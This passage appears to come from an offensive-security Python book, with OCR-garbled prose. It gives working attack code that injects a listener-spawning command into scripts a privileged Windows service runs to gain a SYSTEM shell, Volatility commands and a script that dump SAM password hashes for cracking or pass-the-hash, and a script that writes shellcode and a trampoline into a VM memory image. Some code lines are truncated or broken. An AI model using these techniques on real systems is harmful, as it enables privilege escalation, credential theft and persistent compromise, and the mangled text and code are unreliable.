s c rip t a nd a d d th e f o llo w in g c o de a fte r
th e f ile m odific ati o n c o nsta nts :
➊ file_types = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_types['.vbs'] =
["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" %
command]
file_types['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
file_types['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"\r\n" % command]
# function to handle the code injection
def inject_code(full_filename,extension,contents):
# is our marker already in the file?
➋ if file_types[extension][0] in contents:
return
# no marker; let's inject the marker and code
full_contents = file_types[extension][0]
full_contents += file_types[extension][1]
full_contents += contents
➌ fd = open(full_filename,"wb")
fd.write(full_contents)
fd.close()
print "[\o/] Injected code."
return
We s ta rt b y d efin in g a d ic ti o nary o f c o de s n ip pets th at m atc h a p arti c ula r f ile e xte nsio n
➊ th at
in clu d es a u niq ue m ark er a nd th e c o de w e w ant to i n je ct. T he r e aso n w e u se a m ark er i s b ecause w e
can g et i n to a n i n fin ite l o op w here b y w e s e e a f ile m odific ati o n, w e i n se rt o ur c o de ( w hic h c ause s a
su b se q uent f ile m odific ati o n e v ent) , a nd s o f o rth . T his c o nti n ues u nti l th e f ile g ets g ig anti c a nd th e
hard d riv e b egin s to c ry . T he n ext p ie ce o f c o de i s o ur
inject_code
f u ncti o n th at h and le s th e a ctu al
co de i n je cti o n a nd f ile m ark er c heckin g. A fte r w e v erify th at th e m ark er d oesn ’t e xis t
➋ , w e w rite
out th e m ark er a nd th e c o de w e w ant th e ta rg et p ro cess to r u n
➌ . N ow w e n eed to m odify o ur m ain
ev ent l o op to i n clu d e o ur f ile e xte nsio n c heck a nd th e c all to
inject_code
.

--snip--
elif action == FILE_MODIFIED:
print "[ * ] Modified %s" % full_filename
# dump out the file contents
print "[vvv] Dumping contents..."
try:
fd = open(full_filename,"rb")
contents = fd.read()
fd.close()

print contents
print "[^^^] Dump complete."
except:
print "[!!!] Failed."
#### NEW CODE STARTS HERE
➊ filename,extension = os.path.splitext(full_filename)
➋ if extension in file_types:
inject_code(full_filename,extension,contents)
#### END OF NEW CODE

--snip--
This i s a p re tty s tr a ig htf o rw ard a d diti o n to o ur p rim ary l o op. W e d o a q uic k s p lit o f th e f ile e xte nsio n
➊ a nd th en c heck i t a gain st o ur d ic ti o nary o f k no w n f ile ty p es
➋ . I f th e f ile e xte nsio n i s d ete cte d i n
our d ic ti o nary , w e c all o ur
inject_code
f u ncti o n. L et’ s ta ke i t f o r a s p in .

Kic k in g t h e T ir e s
If y o u i n sta lle d th e e xam ple v uln era b le s e rv ic e a t th e b egin nin g o f th is c hap te r, y o u c an e asily te st
yo ur f a ncy n ew c o de i n je cto r. M ake s u re th at th e s e rv ic e i s r u nnin g, a nd s im ply e xecute y o ur
file _ m onito r.p y
s c rip t. E ventu ally , y o u s h o uld s e e o utp ut i n d ic ati n g th at a
.v b s
f ile h as b een c re ate d
and m odifie d a nd th at c o de h as b een i n je cte d . I f a ll w ent w ell, y o u s h o uld b e a b le to r u n th e
bhpnet.p y
s c rip t f r o m
Chap te r 2
to c o nnect th e l is te ner y o u j u st s p aw ned . T o m ake s u re y o ur p riv ile ge
esc ala ti o n w ork ed , c o nnect to th e l is te ner a nd c heck w hic h u se r y o u a re r u nnin g a s.
justin$
./bhpnet.py -t 192.168.1.10 -p 9999


whoami
NT AUTHORITY\SYSTEM

This w ill i n d ic ate th at y o u h av e a chie v ed th e h o ly S Y ST EM a cco unt a nd th at y o ur c o de i n je cti o n
work ed .
You m ay h av e r e ached th e e nd o f th is c hap te r th in kin g th at s o m e o f th ese a tta cks a re a b it e so te ric . B ut
th e m ore ti m e y o u s p end i n sid e a l a rg e e nte rp ris e , th e m ore y o u’ll r e aliz e th at th ese a re q uite v ia b le
atta cks. T he to olin g i n th is c hap te r c an a ll b e e asily e xp and ed u p on o r tu rn ed i n to o ne-o ff s p ecia lty
sc rip ts th at y o u c an u se i n s p ecific c ase s to c o m pro m is e a l o cal a cco unt o r a p plic ati o n. W MI a lo ne
can b e a n e xcelle nt s o urc e o f l o cal r e co n d ata th at y o u c an u se to f u rth er a n a tta ck o nce y o u a re i n sid e
a n etw ork . P riv ile ge e sc ala ti o n i s a n e sse nti a l p ie ce to a ny g o od tr o ja n.
[ 21
]
This c ode w as a dapte d f ro m th e P yth on W MI p age (
http ://tim gold en .m e.u k/p yth on/w mi/tu to ria l.h tm l
).
[ 22
]
Win32_Process
c la ss d ocum enta tio n:
http ://m sd n.m ic ro so ft.c o m /e n -u s/lib ra ry /a a394372(v = vs.8 5).a sp x
[ 23
]
MSD N – A ccess T okens:
http ://m sd n.m ic ro so ft.c o m /e n -u s/lib ra ry /A a374909.a sp x
[ 24
]
For th e f u ll lis t o f p riv ile ges, v is it
http ://m sd n.m ic ro so ft.c o m /e n -u s/lib ra ry /w in dow s/d esk to p/b b530716(v = vs.8 5).a sp x
.
[ 25
]
Carlo s P ere z d oes s o m e a m azin g w ork w it h P ow erS hell; s e e
http ://w ww.d ark opera to r.c o m /
.

Chap te r 1 1 . A uto m atin g O ffe n siv e F ore n sic s
Fore nsic s f o lk s a re o fte n c alle d i n a fte r a b re ach, o r to d ete rm in e i f a n “ in cid ent” h as ta ken p la ce a t
all. T hey ty p ic ally w ant a s n ap sh o t o f th e a ffe cte d m achin e’s R A M i n o rd er to c ap tu re c ry p to gra p hic
keys o r o th er i n fo rm ati o n th at r e sid es o nly i n m em ory . L ucky f o r th em , a te am o f ta le nte d d ev elo pers
has c re ate d a n e nti r e P yth o n f r a m ew ork s u ita b le f o r th is ta sk c alle d
Vola tility
, b ille d a s a n a d vanced
mem ory f o re nsic s f r a m ew ork . I n cid ent r e sp ond ers , f o re nsic e xam in ers , a nd m alw are a naly sts c an u se
Vola ti lity f o r a v arie ty o f o th er ta sk s a s w ell, i n clu d in g i n sp ecti n g k ern el o bje cts , e xam in in g a nd
dum pin g p ro cesse s, a nd s o o n. W e, o f c o urs e , a re m ore i n te re ste d i n th e o ffe nsiv e c ap ab iliti e s th at
Vola ti lity p ro vid es.
We f ir s t e xp lo re u sin g s o m e o f th e c o m mand -lin e c ap ab iliti e s to r e tr ie v e p assw ord h ash es f r o m a
ru nnin g V M Ware v ir tu al m achin e, a nd th en s h o w
ho w w e c an a uto m ate th is tw o-s te p p ro cess b y
in clu d in g V ola ti lity i n o ur s c rip ts . T he f in al e xam ple s h o w s h o w w e c an i n je ct s h ellc o de d ir e ctl y i n to
a r u nnin g V M a t a p re cis e l o cati o n th at w e c ho ose . T his te chniq ue c an b e u se fu l to n ail th o se p ara no id
use rs w ho b ro w se o r s e nd e m ails o nly f r o m a V M . W e c an a ls o l e av e a b ackd oor h id den i n a V M
sn ap sh o t th at w ill b e e xecute d w hen th e a d m in is tr a to r r e sto re s th e V M . T his c o de i n je cti o n m eth o d i s
als o u se fu l f o r r u nnin g c o de o n a c o m pute r th at h as a F ir e W ir e p ort th at y o u c an a ccess b ut w hic h i s
lo cked o r a sle ep a nd r e q uir e s a p assw ord . L et’ s g et s ta rte d !

In sta lla tio n
Vola ti lity i s e xtr e m ely e asy to i n sta ll; y o u j u st n eed to d ow nlo ad i t f r o m
http s://c o de.g oogle .c o m /p /v o la tility /d ow nlo ads/lis t
. I ty p ic ally d on’t d o a f u ll i n sta lla ti o n. I n ste ad , I
keep i t i n a l o cal d ir e cto ry a nd a d d th e d ir e cto ry to m y w ork in g p ath , a s y o u’ll s e e i n th e f o llo w in g
se cti o ns. A W in d ow s i n sta lle r i s a ls o i n clu d ed . C ho ose th e i n sta lla ti o n m eth o d o f y o ur c ho ic e; i t
sh o uld w ork f in e w hate v er y o u d o.

Pro file s
Vola ti lity u se s th e c o ncep t o f
pro file s
to d ete rm in e h o w to a p ply n ecessa ry s ig natu re s a nd o ffs e ts to
plu ck i n fo rm ati o n o ut o f m em ory d um ps. B ut i f y o u c an r e tr ie v e a m em ory i m age f r o m a ta rg et v ia
Fir e W ir e o r r e m ote ly , y o u m ig ht n o t n ecessa rily k no w th e e xact v ers io n o f th e o pera ti n g s y ste m
yo u’re a tta ckin g. T hankfu lly , V ola ti lity i n clu d es a p lu gin c alle d
imageinfo
th at a tte m pts to d ete rm in e
whic h p ro file y o u s h o uld u se a gain st th e ta rg et. Y ou c an r u n th e p lu gin l ik e s o :
$
python vol.py imageinfo -f "memorydump.img"
Afte r y o u r u n i t, y o u s h o uld g et a g o od c hunk o f i n fo rm ati o n b ack. T he m ost i m porta nt l in e i s th e
Suggested Profiles
l in e, w hic h s h o uld l o ok s o m eth in g l ik e th is :
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86
When y o u’re p erfo rm in g th e n ext f e w e xerc is e s o n a ta rg et, y o u s h o uld s e t th e c o m mand -lin e f la g
--
profile
to th e a p pro pria te v alu e s h o w n, s ta rti n g w ith th e f ir s t o ne l is te d . I n th e a b ove s c enario , w e’d
use :
$ python vol.py
plugin
--profile="WinXPSP2x86"
arguments
You’ll k no w i f y o u s e t th e w ro ng p ro file b ecause n o ne o f th e p lu gin s w ill f u ncti o n p ro perly , o r
Vola ti lity w ill th ro w e rro rs i n d ic ati n g th at i t c o uld n’t f in d a s u ita b le a d dre ss m ap pin g.

Gra b bin g P assw ord H ash es
Reco verin g th e p assw ord h ash es o n a W in d ow s m achin e a fte r p enetr a ti o n i s a c o m mon g o al a m ong
atta ckers . T hese h ash es c an b e c ra cked o fflin e i n a n a tte m pt to r e co ver th e ta rg et’ s p assw ord , o r th ey
can b e u se d i n a p ass-th e-h ash a tta ck to g ain a ccess to o th er n etw ork r e so urc es. L ookin g th ro ugh th e
VM s o r s n ap sh o ts o n a ta rg et i s a p erfe ct p la ce to a tte m pt to r e co ver th ese h ash es.
Wheth er th e ta rg et i s a p ara no id u se r w ho p erfo rm s h ig h-ris k o pera ti o ns o nly o n a V M o r a n
ente rp ris e a tte m pti n g to c o nta in s o m e o f i ts u se r’s a cti v iti e s to V M s, th e V M s p re se nt a n e xcelle nt
poin t to g ath er i n fo rm ati o n a fte r y o u’v e g ain ed a ccess to th e h o st h ard w are .
Vola ti lity m akes th is r e co very p ro cess e xtr e m ely e asy. F ir s t, w e’ll ta ke a l o ok a t h o w to o pera te th e
necessa ry p lu gin s to r e tr ie v e th e o ffs e ts i n m em ory w here th e p assw ord h ash es c an b e r e tr ie v ed , a nd
th en r e tr ie v e th e h ash es th em se lv es. T hen w e’ll c re ate a s c rip t to c o m bin e th is i n to a s in gle s te p .
Win d ow s s to re s l o cal p assw ord s i n th e
SAM
r e gis tr y h iv e i n a h ash ed f o rm at, a nd a lo ngsid e th is th e
Win d ow s b oot k ey s to re d i n th e
system
r e gis tr y h iv e. W e n eed b oth o f th ese h iv es i n o rd er to e xtr a ct
th e h ash es f r o m a m em ory i m age. T o s ta rt, l e t’ s r u n th e
hivelist
p lu gin to m ake V ola ti lity e xtr a ct th e
offs e ts i n m em ory w here th ese tw o h iv es l iv e. T hen w e’ll p ass th is i n fo rm ati o n o ff to th e
hashdump
plu gin to d o th e a ctu al h ash e xtr a cti o n. D ro p i n to y o ur te rm in al a nd e xecute th e f o llo w in g c o m mand :
$
python vol.py hivelist --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem"
Afte r a m in ute o r tw o, y o u s h o uld b e p re se nte d w ith s o m e o utp ut d is p la yin g w here th o se r e gis tr y
hiv es l iv e i n m em ory . I c lip ped o ut a p orti o n o f th e o utp ut f o r b re v ity ’s s a ke.
Virtual Physical Name
---------- ---------- ----
0xe1666b60 0x0ff01b60 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1673b60
0x0fedbb60 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe1455758 0x070f7758 [no name]
0xe1035b60
0x06cd3b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
In th e o utp ut, y o u c an s e e th e v ir tu al a nd p hysic al m em ory o ffs e ts o f b oth th e
SAM
a nd
system
k eys i n
bold . K eep i n m in d th at th e v ir tu al o ffs e t d eals w ith w here i n m em ory , i n r e la ti o n to th e o pera ti n g
sy ste m , th o se h iv es e xis t. T he p hysic al o ffs e t i s th e l o cati o n i n th e a ctu al
.v m em
f ile o n d is k w here
th o se h iv es e xis t. N ow th at w e h av e th e
SAM
a nd
system
h iv es, w e c an p ass th e v ir tu al o ffs e ts to th e
hashdump
p lu gin . G o b ack to y o ur te rm in al a nd e nte r th e f o llo w in g c o m mand , n o ti n g th at y o ur v ir tu al
ad dre sse s w ill b e d iffe re nt th an th e o nes I s h o w .
$
python vol.py hashdump -d -d -f "WindowsXPSP2.vmem"
--profile=WinXPSP2x86 -y 0xe1035b60 -s 0xe17adb60
Runnin g th e a b ove c o m mand s h o uld g iv e y o u r e su lts m uch l ik e th e o nes b elo w :
Administrator:500:74f77d7aaaddd538d5b79ae2610dd89d4c:537d8e4d99dfb5f5e92e1fa3
77041b27:::
Guest:501:aad3b435b51404ad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:bf57b0cf30812c924kdkkd68c99f0778f7:457fbd0ce4f6030978d124j
272fa653:::
SUPPORT_38894df:1002:aad3b435221404eeaad3b435b51404ee:929d92d3fc02dcd099fdaec
fdfa81aee:::
Perfe ct! W e c an n o w s e nd th e h ash es o ff to o ur f a v orite c ra ckin g to ols o r e xecute a p ass-th e-h ash to
auth enti c ate to o th er s e rv ic es.
Now l e t’ s ta ke th is tw o-s te p p ro cess a nd s tr e am lin e i t i n to o ur o w n s ta nd alo ne s c rip t. C ra ck o pen
gra bhash es.p y
a nd e nte r th e f o llo w in g c o de:

import sys
import struct
import volatility.conf as conf
import volatility.registry as registry
➊ memory_file = "WindowsXPSP2.vmem"
➋ sys.path.append("/Users/justin/Downloads/volatility-2.3.1")
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
Fir s t w e s e t a v aria b le to p oin t to th e m em ory i m age
➊ th at w e’re g o in g to a naly ze . N ext w e i n clu d e
our V ola ti lity d ow nlo ad p ath
➋ s o th at o ur c o de c an s u ccessfu lly i m port th e V ola ti lity l ib ra rie s. T he
re st o f th e s u p porti n g c o de i s j u st to s e t u p o ur i n sta nce o f V ola ti lity w ith p ro file a nd c o nfig ura ti o n
opti o ns s e t a s w ell.
Now l e t’ s p lu m b i n o ur a ctu al h ash -d um pin g c o de. A dd th e f o llo w in g l in es to
gra bhash es.p y
.
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
➊ registry = RegistryApi(config)
➋ registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
➌ if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x" % offset
➍ if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x" % offset
if sam_offset is not None and sys_offset is not None:
➎ config.sys_offset = sys_offset
config.sam_offset = sam_offset
➏ hashdump = HashDump(config)
➐ for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets."
We f ir s t i n sta nti a te a n ew i n sta nce o f
RegistryApi
➊ th at’ s a h elp er c la ss w ith c o m monly u se d
re gis tr y f u ncti o ns; i t ta kes o nly th e c urre nt c o nfig ura ti o n a s a p ara m ete r. T he
populate_offsets

call th en p erfo rm s th e e q uiv ale nt to r u nnin g th e
hivelist
c o m mand th at w e p re v io usly c o vere d .
Next, w e s ta rt w alk in g th ro ugh e ach o f th e d is c o vere d h iv es l o okin g f o r th e
SAM
➌ a nd
system


hiv es. W hen th ey’re d is c o vere d , w e u p date th e c urre nt c o nfig ura ti o n o bje ct w ith th eir r e sp ecti v e
offs e ts
➎ . T hen w e c re ate a
HashDump
o bje ct
➏ a nd p ass i n th e c urre nt c o nfig ura ti o n o bje ct. T he
fin al s te p
➐ i s to i te ra te o ver th e r e su lts f r o m th e c alc ula te f u ncti o n c all, w hic h p ro duces th e a ctu al
use rn am es a nd th eir a sso cia te d h ash es.
Now r u n th is s c rip t a s a s ta nd alo ne P yth o n f ile :
$
python grabhashes.py
You s h o uld s e e th e s a m e o utp ut a s w hen y o u r a n th e tw o p lu gin s i n d ep end entl y . O ne ti p I s u ggest i s
th at a s y o u l o ok to c hain f u ncti o nality to geth er ( o r b orro w e xis ti n g f u ncti o nality ), g re p th ro ugh th e
Vola ti lity s o urc e c o de to s e e h o w th ey’re d oin g th in gs u nd er th e h o od. V ola ti lity i s n ’t a P yth o n l ib ra ry
lik e S cap y, b ut b y e xam in in g h o w th e d ev elo pers u se th eir c o de, y o u’ll s e e h o w to p ro perly u se a ny
cla sse s o r f u ncti o ns th at th ey e xp ose .
Now l e t’ s m ove o n to s o m e s im ple r e v ers e e ngin eerin g, a s w ell a s ta rg ete d c o de i n je cti o n to i n fe ct a
vir tu al m achin e.

Dir e ct C od e I n je ctio n
Vir tu aliz a ti o n te chno lo gy i s b ein g u se d m ore a nd m ore f r e q uentl y a s ti m e g o es o n, w heth er b ecause o f
para no id u se rs , c ro ss-p la tf o rm r e q uir e m ents f o r o ffic e s o ftw are , o r th e c o ncentr a ti o n o f s e rv ic es o nto
beefie r h ard w are s y ste m s. I n e ach o f th ese c ase s, i f y o u’v e c o m pro m is e d a h o st s y ste m a nd y o u s e e
VM s i n u se , i t c an b e h and y to c lim b i n sid e th em . I f y o u a ls o s e e V M s n ap sh o t f ile s l y in g a ro und , th ey
can b e a p erfe ct p la ce to i m pla nt s h ell- c o de a s a m eth o d f o r p ers is te nce. I f a u se r r e v erts to a
sn ap sh o t th at y o u’v e i n fe cte d , y o ur s h ellc o de w ill e xecute a nd y o u’ll h av e a f r e sh s h ell.
Part o f p erfo rm in g c o de i n je cti o n i n to th e g uest i s th at w e n eed to f in d a n i d eal s p ot to i n je ct th e c o de.
If y o u h av e th e ti m e, a p erfe ct p la ce i s to f in d th e m ain s e rv ic e l o op i n a S Y ST EM p ro cess b ecause
yo u’re g uara nte ed a h ig h l e v el o f p riv ile ge o n th e V M a nd th at y o ur s h ellc o de w ill b e c alle d . T he
dow nsid e i s th at i f y o u p ic k th e w ro ng s p ot, o r y o ur s h ellc o de i s n ’t w ritte n p ro perly , y o u c o uld
co rru p t th e p ro cess a nd g et c aught b y th e e nd u se r o r k ill th e V M i ts e lf.
We’re g o in g to d o s o m e s im ple r e v ers e e ngin eerin g o f th e W in d ow s c alc ula to r a p plic ati o n a s a
sta rti n g ta rg et. T he f ir s t s te p i s to l o ad u p
ca lc .e xe
i n I m munity D eb ugger
[ 26
]
a nd w rite a s im ple c o de
co vera ge s c rip t th at h elp s u s f in d th e
= b utto n f u ncti o n. T he i d ea i s th at w e c an r a p id ly p erfo rm th e
re v ers e e ngin eerin g, te st o ur c o de i n je cti o n m eth o d, a nd e asily r e p ro duce th e r e su lts . U sin g th is a s a
fo und ati o n, y o u c o uld p ro gre ss to f in d in g tr ic kie r ta rg ets a nd i n je cti n g m ore a d vanced s h ellc o de.
Then, o f c o urs e , f in d a c o m pute r th at s u p ports F ir e W ir e a nd tr y i t o ut th ere !
Let’ s g et s ta rte d w ith a s im ple I m munity D eb ugger P yC om mand . O pen a n ew f ile o n y o ur W in d ow s
XP V M a nd n am e i t
co deco vera ge.p y
. M ake s u re to s a v e th e f ile i n th e m ain I m munity D eb ugger
in sta lla ti o n d ir e cto ry u nd er th e
PyC om mands
f o ld er.
from immlib import *
class cc_hook(LogBpHook):
def __init__(self):
LogBpHook.__init__(self)
self.imm = Debugger()
def run(self,regs):
self.imm.log("%08x" % regs['EIP'],regs['EIP'])
self.imm.deleteBreakpoint(regs['EIP'])
return
def main(args):
imm = Debugger()
calc = imm.getModule("calc.exe")
imm.analyseCode(calc.getCodebase())
functions = imm.getAllFunctions(calc.getCodebase())
hooker = cc_hook()
for function in functions:
hooker.add("%08x" % function, function)
return "Tracking %d functions." % len(functions)
This i s a s im ple s c rip t th at f in d s e v ery f u ncti o n i n
ca lc .e xe
a nd f o r e ach o ne s e ts a o ne-s h o t

bre akp oin t. T his m eans th at f o r e v ery f u ncti o n th at g ets e xecute d , I m munity D eb ugger o utp uts th e
ad dre ss o f th e f u ncti o n a nd th en r e m oves th e b re akp oin t s o th at w e d on’t c o nti n ually l o g th e s a m e
fu ncti o n a d dre sse s. L oad
ca lc .e xe
i n I m munity D eb ugger, b ut d on’t r u n i t y et. T hen i n th e c o m mand
bar a t th e b otto m o f I m munity D eb ugger’s s c re en, e nte r:
!
codecoverage
Now y o u c an r u n th e p ro cess b y p re ssin g th e F 9 k ey. I f y o u s w itc h to th e L og V ie w (
ALT
-L ), y o u’ll s e e
fu ncti o ns s c ro ll b y. N ow c lic k a s m any b utto ns a s y o u w ant,
excep t
th e = b utto n. T he i d ea i s th at y o u
want to e xecute e v ery th in g b ut th e o ne f u ncti o n y o u’re l o okin g f o r. A fte r y o u’v e c lic ked a ro und
eno ugh, r ig ht- c lic k i n th e L og V ie w a nd s e le ct
Cle ar W in dow
. T his r e m oves a ll o f y o ur p re v io usly
hit f u ncti o ns. Y ou c an v erify th is b y c lic kin g a b utto n y o u p re v io usly c lic ked ; y o u s h o uld n’t s e e
anyth in g a p pear i n th e l o g w in d ow . N ow l e t’ s c lic k th at p esk y = b utto n. Y ou s h o uld s e e o nly a s in gle
entr y i n th e l o g s c re en ( y o u m ig ht h av e to e nte r a n e xp re ssio n l ik e
3+3
a nd th en h it th e = b utto n). O n
my W in d ow s X P S P2 V M , th is a d dre ss i s
0x01005D51
.
All r ig ht! O ur w hir lw in d to ur o f I m munity D eb ugger a nd s o m e b asic c o de c o vera ge te chniq ues i s
over a nd w e h av e th e a d dre ss w here w e w ant to i n je ct c o de. L et’ s s ta rt w riti n g o ur V ola ti lity c o de to
do th is n asty b usin ess.
This i s a m ulti s ta ge p ro cess. W e f ir s t n eed to s c an m em ory l o okin g f o r th e
ca lc .e xe
p ro cess a nd th en
hunt th ro ugh i ts m em ory s p ace f o r a p la ce to i n je ct th e s h ellc o de, a s w ell a s to f in d th e p hysic al o ffs e t
in th e R A M i m age th at c o nta in s th e f u ncti o n w e p re v io usly f o und . W e th en h av e to i n se rt a s m all j u m p
over th e f u ncti o n a d dre ss f o r th e = b utto n th at j u m ps to o ur s h ellc o de a nd e xecute s i t. T he s h ellc o de
we u se f o r th is e xam ple i s f r o m a d em onstr a ti o n I d id a t a f a nta sti c C anad ia n s e curity c o nfe re nce
calle d C ounte rm easu re . T his s h ellc o de i s u sin g h ard co ded o ffs e ts , s o y o ur m ile age m ay v ary .
[ 27
]
Open a n ew f ile , n am e i t
co de_ in je ct.p y
, a nd h am mer o ut th e f o llo w in g c o de.
import sys
import struct
equals_button = 0x01005D51
memory_file = "WinXPSP2.vmem"
slack_space = None
trampoline_offset = None
# read in our shellcode
➊ sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
sys.path.append("/Users/justin/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "WinXPSP2x86"

config.LOCATION = "file://%s" % memory_file
This s e tu p c o de i s i d enti c al to th e p re v io us c o de y o u w ro te , w ith th e e xcep ti o n th at w e’re r e ad in g i n
th e s h ellc o de
➊ th at w e w ill i n je ct i n to th e V M .
Now l e t’ s p ut th e r e st o f th e c o de i n p la ce to a ctu ally p erfo rm th e i n je cti o n.
import volatility.plugins.taskmods as taskmods
➊ p = taskmods.PSList(config)
➋ for process in p.calculate():
if str(process.ImageFileName) == "calc.exe":
print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
print "[*] Hunting for physical offsets...please wait."
➌ address_space = process.get_process_address_space()
➍ pages = address_space.get_available_pages()
We f ir s t i n sta nti a te a n ew
PSList
c la ss
➊ a nd p ass i n o ur c urre nt c o nfig ura ti o n. T he
PSList
m odule
is r e sp onsib le f o r w alk in g th ro ugh a ll o f th e r u nnin g p ro cesse s d ete cte d i n th e m em ory i m age. W e
ite ra te o ver e ach p ro cess
➋ a nd i f w e d is c o ver a
ca lc .e xe
p ro cess, w e o bta in i ts f u ll a d dre ss s p ace
➌ a nd a ll o f th e p ro cess’s m em ory p ages
➍ .
Now w e’re g o in g to w alk th ro ugh th e m em ory p ages to f in d a c hunk o f m em ory th e s a m e s iz e a s o ur
sh ellc o de th at’ s f ille d w ith z e ro s. A s w ell, w e’re l o okin g f o r th e v ir tu al a d dre ss o f o ur
= b utto n
hand le r s o th at w e c an w rite o ur tr a m polin e. E nte r th e f o llo w in g c o de, b ein g m in d fu l o f th e
in d enta ti o n.
for page in pages:
➊ physical = address_space.vtop(page[0])
if physical is not None:
if slack_space is None:
➋ fd = open(memory_file,"r+")
fd.seek(physical)
buf = fd.read(page[1])
try:
➌ offset = buf.index("\x00" * len(sc))
slack_space = page[0] + offset
print "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x" % slack_space
print "[*] Physical address: 0x%08x" % (physical.
+ offset)
print "[*] Injecting shellcode."
➍ fd.seek(physical + offset)
fd.write(sc)
fd.flush()
# create our trampoline
➎ tramp = "\xbb%s" % struct.pack(" tramp += "\xff\xe3"
if trampoline_offset is not None:
break
except:
pass

fd.close()
# check for our target code location
➏ if page[0] <= equals_button and .
equals_button < ((page[0] + page[1])-7):
print "[*] Found our trampoline target at: 0x%08x" .
% (physical)
# calculate virtual offset
➐ v_offset = equals_button - page[0]
# now calculate physical offset
trampoline_offset = physical + v_offset
print "[*] Found our trampoline target at: 0x%08x" .
% (trampoline_offset)
if slack_space is not None:
break
print "[*] Writing trampoline..."
➑ fd = open(memory_file, "r+")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()
print "[*] Done injecting code."
All r ig ht! L et’ s w alk th ro ugh w hat a ll o f th is c o de d oes. W hen w e i te ra te o ver e ach p age, th e c o de
re tu rn s a tw o-m em ber l is t w here
page[0]
i s th e a d dre ss o f th e p age a nd
page[1]
i s th e s iz e o f th e
page i n b yte s. A s w e w alk th ro ugh e ach p age o f m em ory , w e f ir s t f in d th e p hysic al o ffs e t ( re m em ber
th e o ffs e t i n th e R A M i m age o n d is k )
➊ o f w here th e p age l ie s. W e th en o pen th e R A M i m age
➋ ,
se ek to th e o ffs e t o f w here th e p age i s , a nd th en r e ad i n th e e nti r e p age o f m em ory . W e th en a tte m pt to
fin d a c hunk o f N ULL b yte s
➌ th e s a m e s iz e a s o ur s h ellc o de; th is i s w here w e w rite th e s h ellc o de
in to th e R A M i m age
➍ . A fte r w e’v e f o und a s u ita b le s p ot a nd i n je cte d th e s h ellc o de, w e ta ke th e
ad dre ss o f o ur s h ellc o de a nd c re ate a s m all c hunk o f x 8 6 o pco des
➎ . T hese o pco des y ie ld th e
fo llo w in g a sse m bly :
mov ebx, ADDRESS_OF_SHELLCODE
jmp ebx
Keep i n m in d th at y o u c o uld u se V ola ti lity ’s d is a sse m bly f e atu re s to e nsu re th at y o u d is a sse m ble th e
exact n um ber o f b yte s th at y o u r e q uir e f o r y o ur j u m p, a nd r e sto re th o se b yte s i n y o ur s h ellc o de. I ’ ll
le av e th is a s a h o m ew ork a ssig nm ent.
The f in al s te p o f o ur c o de i s to te st w heth er o ur = b utto n f u ncti o n r e sid es i n th e c urre nt p age th at
we’re i te ra ti n g o ver
➏ . I f w e f in d i t, w e c alc ula te th e o ffs e t
➐ a nd th en w rite o ut o ur tr a m polin e
➑ .
We n o w h av e o ur tr a m polin e i n p la ce th at s h o uld tr a nsfe r e xecuti o n to th e s h ellc o de w e p la ced i n th e
RA M i m age.

Kic k in g t h e T ir e s
The f ir s t s te p i s to c lo se I m munity D eb ugger i f i t’ s s ti ll r u nnin g a nd c lo se a ny i n sta nces o f
ca lc .e xe
.
Now f ir e u p
ca lc .e xe
a nd r u n y o ur c o de i n je cti o n s c rip t. Y ou s h o uld s e e o utp ut l ik e th is :
$ python code_inject.py
[*] Found calc.exe with PID 1936
[*] Hunting for physical offsets...please wait.
[*] Found good shellcode location!
[*] Virtual address: 0x00010817
[*] Physical address: 0x33155817
[*] Injecting shellcode.
[*] Found our trampoline target at: 0x3abccd51
[*] Writing trampoline...
[*] Done injecting code.
Beauti fu l! I t s h o uld s h o w th at i t f o und a ll o f th e o ffs e ts , a nd i n je cte d th e s h ellc o de. T o te st i t, s im ply
dro p i n to y o ur V M a nd d o a q uic k
3+3
a nd h it th e = b utto n. Y ou s h o uld s e e a m essa ge p op u p !
Now y o u c an tr y to r e v ers e e ngin eer o th er a p plic ati o ns o r s e rv ic es a sid e f r o m
ca lc .e xe
to tr y th is
te chniq ue a gain st. Y ou c an a ls o e xte nd th is te chniq ue to tr y m anip ula ti n g k ern el o bje cts w hic h c an
mim ic r o otk it b ehav io r. T hese te chniq ues c an b e a f u n w ay to b eco m e f a m ilia r w ith m em ory
fo re nsic s, a nd th ey’re a ls o u se fu l f o r s itu ati o ns w here y o u h av e p hysic al a ccess to m achin es o r h av e
popped a s e rv er h o sti n g n um ero us V M s.
[ 26
]
Dow nlo ad I m munit y D ebugger h ere :
http ://d eb ugger.im munity in c.c o m /
.
[ 27
]
If y ou w ant to w rit e y our o w n M essa geB ox s h ellc ode, s e e th is tu to ria l:
http s://w ww.c o re la n.b e/in dex.p hp/2 010/0 2/2 5/e xp lo it-
